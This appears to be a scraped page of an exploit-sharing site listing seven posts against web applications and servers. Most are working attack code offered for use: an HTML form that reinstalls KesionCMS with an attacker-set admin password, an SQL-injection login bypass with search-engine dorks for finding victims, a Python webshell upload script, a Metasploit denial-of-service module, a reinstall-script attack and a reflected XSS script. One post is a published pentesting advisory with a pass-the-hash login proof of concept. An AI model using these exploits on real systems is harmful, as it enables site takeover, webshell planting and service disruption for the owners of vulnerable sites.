Latest exploits :: CodePwn

<pre><code>==================================================================================================================================== | # Title : KesionCMS ASP v9.5 Reinstall Add Admin Exploit | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 105.0.(32-bit) | | # Vendor : https://www.kesion.com/ | | # Dork : Powered by KesionCMS | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] copy & past this exploit listed below into a text file and save it with ".html" extension [+] at Line 09 & 16 change the domain name of target . [+] The infected folder is /install/ This is due to direct unauthorized access to the fourth stage (?action=s4)of the script installation The fourth stage (?action=s4)is responsible for configuring the setting of the site administrator. For this, the vulnerability can be exploited through the direct link or using the exploitation written below [+] Exploit <head><title> Hacked By indoushka </title><link href="http://www.tzxdcpv.com/install/images/guide.css" rel="stylesheet" /> <script src="http://www.tzxdcpv.com/ks_inc/jquery.js" type="text/javascript"></script> <script src="http://www.tzxdcpv.com/ks_inc/common.js" type="text/javascript"></script> <script src="http://www.tzxdcpv.com/ks_inc/lhgdialog.js"></script> </head> <body> <form name="form" method="post" action="http://www.target.127.0.0.1/install/index.asp" id="form"> <div class="guide"> <div class="guidetitle"> </div> <div class="clear"></div> </div> <div class="clear"></div> <input type="hidden" name="action" value="http://www.target.127.0.0.1/install/?action=s5" /> <input type="hidden" name="DBlx" value="" /> <input type="hidden" name="CkbData" value="" /> <input type="hidden" name="TxtDBName_a" value="" /> <input name="TxtDBService" value="" id="TxtDBService" class="text" type="hidden" /> <input name="TxtDBName" value="" id="TxtDBName" class="text" type="hidden" /> <input name="TxtDBUser" value="" id="TxtDBUser" class="text" type="hidden" /> <input name="TxtDBPass" value="" id="TxtDBPass" class="text" type="hidden" /> <div id="http://www.target.127.0.0.1/install/?action=s4"> </div> <div class="clear"></div> <div class="sjlist"> <h5>网站参数配置</h5> <ul> <li>网站名称：<input name="TxtSiteName" value="科兴网络开发" id="TxtSiteName" class="text" type="text">* 如：Kesion官方站</li> <li>网站域名：<input name="TxtSiteUrl" value="http://cxsecurity.com" id="TxtSiteUrl" class="text" type="text">* 后面不要带“/”。 如http://www.kesion.com。 </li> <li>安装目录：<input name="TxtInstallDir" value="/" id="TxtInstallDir" class="text" type="text">* 后面不要带“/”。 系统会自动获取，建议不要修改。 </li> <li>授权码：<input name="TxtSiteKey" value="0" id="TxtSiteKey" class="text" type="text"> 免费版本用户请留空或填“0”。 </li> <li>后台目录：<input name="TxtManageDir" value="Admin/" id="TxtManageDir" class="text" type="text">* 如：Manage,Admin，后面必须带"/"符号。</li> <li> 后台登录验证码： <input type="radio" name="isCode_a" value="True" /> 启用 <input type="radio" value="False" name="isCode_a" checked="checked"/> 不启用 </li> <li>管理认证码： <input type="radio" name="isCode" value="True" onclick="$('#rzm').show()"/> 启用 <input onclick="$('#rzm').hide()" type="radio" value="False" name="isCode" checked="checked" /> 不启用 认证码：<input name="TxtManageCode" value="8888" id="TxtManageCode" class="text" style="width:100px;" type="text"></li> </ul> <div class="clear"></div> <h5>填写管理员信息</h5> <ul> <li>管理员账号：<input name="TxtUserName" value="admin" id="TxtUserName" class="text" type="text">* </li> <li>管理员密码：<input name="TxtUserPass" value="admin888" id="TxtUserPass" class="text" type="text">* 管理员密码不能为空</li> <li>重复密码：<input name="TxtReUserPass" value="admin888" id="TxtReUserPass" class="text" type="text"></li> </ul> <div class="clear blank10"></div> <div style="padding:5px"> <input name="Button1" value="下一步" onClick="return(doCheck());" id="Button1" class="btnbg" type="submit"> </div> </div> Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | | ======================================================================================================================================= </code></pre>

<pre><code>================================================================================ | # Title : E-commerce Biig Order CMS V2 Auth by Pass Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : firefox 113.0.1(64 bits) | | # Vendor : https://www.vaskar.in/ | | # Dork : "shop_detail.php?detail=" | ================================================================================ poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use Payload : User & Pass : ' or 0=0 # [+] https://127.0.0.1/www/biigorder.com/admin/manage-order.php Greetings to :===================================================================================== jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | =================================================================================================== </code></pre>

<pre><code>Advisory: STARFACE: Authentication with Password Hash Possible RedTeam Pentesting discovered that the web interface of STARFACE as well as its REST API allows authentication using the SHA512 hash of the password instead of the cleartext password. While storing password hashes instead of cleartext passwords in an application's database generally has become best practice to protect users' passwords in case of a database compromise, this is rendered ineffective when allowing to authenticate using the password hash. Details ======= Product: STARFACE Affected Versions: 7.3.0.10 and earlier versions Fixed Versions: - Vulnerability Type: Broken Authentication Security Risk: low Vendor URL: https://www.starface.de Vendor Status: notified Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2022-004 Advisory Status: published CVE: CVE-2023-33243 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33243 Introduction ============ "When functionality and comfort come together, the result is a state-of-the-art experience that we've dubbed 'comfortphoning'. It's a secure, scalable digital communication solution that meets every need and wish. STARFACE is easy to integrate into existing IT systems and flexibly grows with your requirements." (from the vendor's homepage) More Details ============ The image of STARFACE PBX [0] in version 7.3.0.10 can be downloaded from the vendor's homepage [1]. The included files can be further examined by either extracting the contents or running the image in a virtual machine. The web interface of the PBX uses the JavaScript file at the following path to submit the login form: ------------------------------------------------------------------------ js/prettifier.js ------------------------------------------------------------------------ The following two lines of the JavaScript file "prettifier.js" add the two parameters "secret" and "ack" to the form before being submitted: ------------------------------------------------------------------------ $form(document.forms[0]).add('secret', createHash(defaultVals.isAd, liv, lpv, defaultVals.k + defaultVals.bk)); $form(document.forms[0]).add('ack', defaultVals.k); ------------------------------------------------------------------------ The JavaScript object "defaultVals" is included in the web application's source text. While the value of "defaultVals.k" was found to be the static hash of the PBX version, the value of "defaultVals.bk" contains a nonce only valid for the currently used session. Therefore, the form parameter "ack" is always the same value. For the form value "secret" the function "createHash()" is called with different arguments. The value of "defaultVals.isAd" is set to "false" when login via Active Directory is disabled. The parameters "liv" and "lpv" contain the username and password entered into the form respectively. ------------------------------------------------------------------------ const createHash = function (isAD, user, pass, nonces) { if (isAD) { return forAD.encode(user + nonces + pass); } return user + ':' + forSF(user + nonces + forSF(pass)); }; ------------------------------------------------------------------------ The expression right after the second return statement is the implementation used when Active Directory login is disabled which is the default setting. The return value is composed of the username separated via a colon from a value built using the "forSF()" function. The "forSF()" function was found to calculate the SHA512 hash value. When considering the arguments passed to the function, the hash is calculated as follows: ------------------------------------------------------------------------ SHA512(username + defaultVals.k + defaultVals.bk + SHA512(password)) ------------------------------------------------------------------------ As can be seen, instead of the cleartext password the SHA512 hash of the password is used in the calculation. In conclusion, for the form value "secret" the following value is transmitted: ------------------------------------------------------------------------ username + ":" + SHA512( username + defaultVals.k + defaultVals.bk + SHA512(password) ) ------------------------------------------------------------------------ If the SHA512 hash of a user's password is known, it can be directly used in the calculation of the "secret" during the login process. Knowledge of the cleartext password is not required. This finding was also verified by analysing the decompiled Java code of the server component. It was also found that the authentication process of the REST API is vulnerable in a very similar manner. Proof of Concept ================ The following Python script can be used to perform a login by specifying a target URL, a username and the associated password hash: ------------------------------------------------------------------------ #!/usr/bin/env python3 import click import hashlib import re import requests import typing def get_values_from_session(url, session) -> typing.Tuple[str, str]: k, bk = "", "" response_content = session.get(f"{url}/jsp/index.jsp").text k_result = re.search("\sk : '([^']+)'", response_content) bk_result = re.search("\sbk : '([^']+)'", response_content) if k_result != None: k = k_result.group(1) if bk_result != None: bk = bk_result.group(1) return k, bk def web_login(url, login, pwhash, session) -> bool: version, nonce = get_values_from_session(url, session) if version == "" or nonce == "": print("Web Login failed: Nonce and version hash can not be retrieved.") return value = login + version + nonce + pwhash secret = hashlib.sha512(value.encode("utf-8")).hexdigest() data = { "forward": "", "autologin": "false", "secret": f"{login}:{secret}", "ack": version, } login_request = session.post( f"{url}/login", data=data, allow_redirects=False, headers={"Referer": f"{url}/jsp/index.jsp"}, ) response_headers = login_request.headers if "Set-Cookie" in response_headers: session_id = response_headers["Set-Cookie"].split("=")[1].split(";")[0] print(f"Session ID: {session_id}") return True else: print("Invalid login data") return False def get_nonce_from_api(url, session) -> str: response_content = session.get(f"{url}/rest/login").json() return response_content["nonce"] if "nonce" in response_content else "" def rest_login(url, login, pwhash, session): nonce = get_nonce_from_api(url, session) if nonce == "": print("REST Login failed: Nonce can not be retrieved.") return value = login + nonce + pwhash secret = hashlib.sha512(value.encode("utf-8")).hexdigest() data = {"loginType": "Internal", "nonce": nonce, "secret": f"{login}:{secret}"} login_request = session.post( f"{url}/rest/login", json=data, headers={"Content-Type": "application/json", "X-Version": "2"}, ) response_data = login_request.json() token = response_data["token"] if "token" in response_data else "none" print(f"REST API Token: {token}") @click.command() @click.option('--url', help='Target System URL', required=True) @click.option('--login', help='Login ID', required=True) @click.option('--pwhash', help='Password Hash', required=True) def login(url, login, pwhash): session = requests.session() stripped_url = url.rstrip("/") result = web_login(stripped_url, login, pwhash, session) if result: rest_login(stripped_url, login, pwhash, session) if __name__ == "__main__": login() ------------------------------------------------------------------------ For example, the SHA512 hash of the password "starface" can be calculated as follows: ------------------------------------------------------------------------ $ echo -n "starface" | sha512sum a37542915e834f6e446137d759cdcb825a054d0baab73fd8db695fc49529bc8e52eb27979dd1dcc21849567bac74180f6511121f76f4a2a1f196670b7375f8ec - ------------------------------------------------------------------------ The Python script can be run as follows to perform a login as the user "0001" with the aforementioned hash: ------------------------------------------------------------------------ $ python3 login.py --url 'https://www.example.com' --login 0001 --pwhash 'a37542915e834f6e446137d759cdcb825a054d0baab73fd8db695fc49529bc8e52eb27979dd1dcc21849567bac74180f6511121f76f4a2a1f196670b7375f8ec' Session ID: 2CF09656E274F000FFAD023AF37629CE REST API Token: 51eef8f8vp3d3u81k0imjbuuu7 ------------------------------------------------------------------------ When the password hash is valid for the specified user of the targeted instance a session ID as well as a REST API token is returned. Afterwards, these values can be used to interact with the web application and the REST API. Workaround ========== None Fix === On 4 May 2023, version 8.0.0.11 was released. In this version the vulnerability was addressed with a temporary solution, such that the password hashes are encrypted before they are saved in the database. This approach prevents attackers from exploiting this vulnerability in scenarios where they have only acquired pure database access. However, attackers with system level access can bypass this temporary measure as they can extract the encryption key and decrypt the hashes in the database. A solution that fixes this vulnerability entirely is still in progress. Security Risk ============= The web interface and REST API of STARFACE allow to login using the password hash instead of the cleartext password. This can be exploited by attackers who gained access to the application's database where the passwords are also saved as a SHA512 hash of the cleartext passwords. While the precondition for this attack could be the full compromise of the STARFACE PBX, another attack scenario could be that attackers acquire access to backups of the database stored on another system. Furthermore, the login via password hash allows attackers for permanent unauthorised access to the web interface even if system access was obtained only temporarily. Due to the prerequisites of obtaining access to password hashes, the vulnerability poses a low risk only. Timeline ======== 2022-12-06 Vulnerability identified 2022-12-13 Customer approved disclosure to vendor 2023-01-11 Vendor notified 2023-05-04 Vendor released new version 8.0.0.11 2023-05-19 CVE ID requested 2023-05-20 CVE ID assigned 2023-06-01 Advisory released References ========== [0] https://starface.com/en/products/comfortphoning/ [1] https://knowledge.starface.de/pages/viewpage.action?pageId=46564694 RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Alter Posthof 1 Fax : +49 241 510081-99 52062 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen </code></pre>

<pre><code>## # Exploit Title: Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit) # Date: 2018-03-09 # Exploit Author: Ege Balci # Vendor Homepage: https://www.flexense.com/downloads.html # Version: <= 10.6.24 # CVE : CVE-2018-8065 # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Dos include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Flexense HTTP Server Denial Of Service', 'Description' => %q{ This module triggers a Denial of Service vulnerability in the Flexense HTTP server. Vulnerability caused by a user mode write access memory violation and can be triggered with rapidly sending variety of HTTP requests with long HTTP header values. Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below vesions reportedly vulnerable. }, 'Author' => [ 'Ege Balci <ege.balci@invictuseurope.com>' ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2018-8065'], [ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ], ], 'DisclosureDate' => '2018-03-09')) register_options( [ Opt::RPORT(80), OptString.new('PacketCount', [ true, "The number of packets to be sent (Recommended: Above 1725)" , 1725 ]), OptString.new('PacketSize', [ true, "The number of bytes in the Accept header (Recommended: 4088-5090" , rand(4088..5090) ]) ]) end def check begin connect sock.put("GET / HTTP/1.0\r\n\r\n") res = sock.get if res and res.include? 'Flexense HTTP Server v10.6.24' Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end rescue Rex::ConnectionRefused print_error("Target refused the connection") Exploit::CheckCode::Unknown rescue print_error("Target did not respond to HTTP request") Exploit::CheckCode::Unknown end end def run unless check == Exploit::CheckCode::Appears fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') end size = datastore['PacketSize'].to_i print_status("Starting with packets of #{size}-byte strings") count = 0 loop do payload = "" payload << "GET /" + Rex::Text.rand_text_alpha(rand(30)) + " HTTP/1.1\r\n" payload << "Host: 127.0.0.1\r\n" payload << "Accept: "+('A' * size)+"\r\n" payload << "\r\n\r\n" begin connect sock.put(payload) disconnect count += 1 break if count==datastore['PacketCount'] rescue ::Rex::InvalidDestination print_error('Invalid destination! Continuing...') rescue ::Rex::ConnectionTimeout print_error('Connection timeout! Continuing...') rescue ::Errno::ECONNRESET print_error('Connection reset! Continuing...') rescue ::Rex::ConnectionRefused print_good("DoS successful after #{count} packets with #{size}-byte headers") return true end end print_error("DoS failed after #{count} packets of #{size}-byte strings") end end </code></pre>

<pre><code># Exploit Title: Faculty Evaluation System 1.0 - Unauthenticated File Upload # Date: 5/29/2023 # Author: Alex Gan # Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip # Version: 1.0 # Tested on: LAMP Fedora server 38 (Thirty Eight) Apache/2.4.57 10.5.19-MariaDB PHP 8.2.6 # CVE: CVE-2023-33440 # References: https://nvd.nist.gov/vuln/detail/CVE-2023-33440 # https://www.exploit-db.com/exploits/49320 # https://github.com/F14me7wq/bug_report/tree/main/vendors/oretnom23/faculty-evaluation-system # #!/usr/bin/env python3 import os import sys import requests import argparse from bs4 import BeautifulSoup from urllib.parse import urlparse from requests.exceptions import ConnectionError, Timeout def get_args(): parser = argparse.ArgumentParser() parser.add_argument('-u', '--url', type=str, help='URL') parser.add_argument('-p', '--payload', type=str, help='PHP webshell') return parser.parse_args() def get_user_input(args): if not (args.url): args.url = input('Use the -u argument or Enter URL:') if not (args.payload): args.payload = input('Use the -p argument or Enter file path PHP webshell: ') return args.url, args.payload def check_input_url(url): parsed_url = urlparse(url) if not parsed_url.scheme: url = 'http://' + url if parsed_url.path.endswith('/'): url = url.rstrip('/') return url def check_host_availability(url): try: response = requests.head(url=url + '/login.php') if response.status_code == 200: print("[+] Host is accessible") else: print("[-] Host is not accessible") print(" Status code:", response.status_code) sys.exit() except (ConnectionError, Timeout) as e: print("[-] Host is not accessible") sys.exit() except requests.exceptions.RequestException as e: print("[-] Error:", e) sys.exit() def make_request(url, method, files=None): if method == 'GET': response = requests.get(url) elif method == 'POST': response = requests.post(url, files=files) else: raise ValueError(f'Invalid HTTP method: {method}') if response.status_code == 200: print('[+] Request successful') return response.text else: print(f'[-] Error {response.status_code}: {response.text}') return None def find_file(response_get, filename, find_url): soup = BeautifulSoup(response_get, 'html.parser') links = soup.find_all('a') found_files = [] for link in links: file_upl = link.get('href') if file_upl.endswith(filename): found_files.append(file_upl) if found_files: print(' File found:') for file in found_files: print('[*] ' + file) print(' Full URL of your file:') for file_url in found_files: print('[*] ' + find_url + file_url) else: print('[-] File not found') def main(): args = get_args() url, payload = get_user_input(args) url = check_input_url(url) check_host_availability(url) post_url = url + "/ajax.php?action=save_user" get_url = url + "/assets/uploads/" filename = os.path.basename(payload) payload_file = [('img',(filename,open(args.payload,'rb'),'application/octet-stream'))] print(" Loading payload file") make_request(post_url, 'POST', files=payload_file) print(" Listing the uploads directory") response_get = make_request(get_url, 'GET') print(" Finding the downloaded payload file") find_file(response_get, filename, get_url) if __name__ == "__main__": main() </code></pre>

<pre><code>==================================================================================================================================== | # Title : Menorah Restaurant - Restaurant Food Ordering System Reinstall script Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) | | # Vendor : https://codecanyon.net/item/menorah-restaurant-restaurant-food-ordering-system/23180351 | | # Dork : "Menorah Restaurant . All Rights Reserved." | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use Payload : /install/loading_website/ ( Load default db contain the demo user and pass ) [+] https://127.0.0.0.1/e-catering.terantrindotama/install/loading_website/ Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | | ======================================================================================================================================= </code></pre>

<pre><code>#Exploit Title: Online Security Guards Hiring System 1.0 – REFLECTED XSS #Google Dork : NA #Date: 23-01-2023 #Exploit Author : AFFAN AHMED #Vendor Homepage: https://phpgurukul.com #Software Link: https://phpgurukul.com/projects/Online-Security-Guard-Hiring-System_PHP.zip #Version: 1.0 #Tested on: Windows 11 + XAMPP + PYTHON-3.X #CVE : CVE-2023-0527 #NOTE: TO RUN THE PROGRAM FIRST SETUP THE CODE WITH XAMPP AND THEN RUN THE BELOW PYTHON CODE TO EXPLOIT IT # Below code check for both the parameter /admin-profile.php and in /search.php #POC-LINK: https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.md import requests import re from colorama import Fore print(Fore.YELLOW + "######################################################################" + Fore.RESET) print(Fore.RED + "# TITLE: Online Security Guards Hiring System v1.0" + Fore.RESET) print(Fore.RED + "# VULNERABILITY-TYPE : CROSS-SITE SCRIPTING (XSS)" + Fore.RESET) print(Fore.RED + "# VENDOR OF THE PRODUCT : PHPGURUKUL" + Fore.RESET) print(Fore.RED + "# AUTHOR : AFFAN AHMED" + Fore.RESET) print(Fore.YELLOW +"######################################################################" + Fore.RESET) print() print(Fore.RED+"NOTE: To RUN THE CODE JUST TYPE : python3 exploit.py"+ Fore.RESET) print() # NAVIGATING TO ADMIN LOGIN PAGE Website_url = "http://localhost/osghs/admin/login.php" # CHANGE THE URL ACCORDING TO YOUR SETUP print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET) print(Fore.CYAN + "[**] Inserting the Username and Password in the Admin Login Form [**]" + Fore.RESET) print(Fore.RED+"----------------------------------------------------------------------"+Fore.RESET) Admin_login_credentials = {'username': 'admin', 'password': 'Test@123', 'login': ''} headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'Referer': 'http://localhost/osghs/admin/login.php', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9', 'Connection': 'close', 'Cookie': 'PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc', 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '?1', 'Sec-Fetch-Dest': 'document' } response = requests.request("POST", Website_url, headers=headers, data = Admin_login_credentials) if response.status_code == 200: location = re.findall(r'document.location =\'(.*?)\'',response.text) if location: print(Fore.GREEN + "> Login Successful into Admin Account"+Fore.RESET) print(Fore.GREEN + "> Popup:"+ Fore.RESET,location ) else: print(Fore.GREEN + "> document.location not found"+ Fore.RESET) else: print(Fore.GREEN + "> Error:", response.status_code + Fore.RESET) print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET) print(Fore.CYAN + " [**] Trying XSS-PAYLOAD in Admin-Name Parameter [**]" + Fore.RESET) # NAVIGATING TO ADMIN PROFILE SECTION TO UPDATE ADMIN PROFILE # INSTEAD OF /ADMIN-PROFILE.PHP REPLACE WITH /search.php TO FIND XSS IN SEARCH PARAMETER Website_url= "http://localhost/osghs/admin/admin-profile.php" # CHANGE THIS URL ACCORDING TO YOUR PREFERENCE # FOR CHECKING XSS IN ADMIN-PROFILE USE THE BELOW PAYLOAD # FOR CHECKING XSS IN SEARCH.PHP SECTION REPLACE EVERYTHING AND PUT searchdata=<your-xss-payload>&search="" payload = { "adminname": "TESTAdmin<script>alert(\"From-Admin-Name\")</script>", # XSS-Payload , CHANGE THIS ACCORDING TO YOUR PREFERENCE "username": "admin", # THESE DETAILS ARE RANDOM , CHANGE IT TO YOUR PREFERENCE "mobilenumber": "8979555558", "email": "admin@gmail.com", "submit": "", } # SENDING THE RESPONSE WITH POST REQUEST response = requests.post(Website_url, headers=headers, data=payload) print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET) # CHECKING THE STATUS CODE 200 AND ALSO FINDING THE SCRIPT TAG WITH THE HELP OF REGEX if response.status_code == 200: scripts = re.findall(r'<script>alert$.*?$</script>', response.text) print(Fore.GREEN + "> Response After Executing the Payload at adminname parameter : "+ Fore.RESET) print(Fore.GREEN+">"+Fore.RESET,scripts) exploit.py Displaying exploit.py. </code></pre>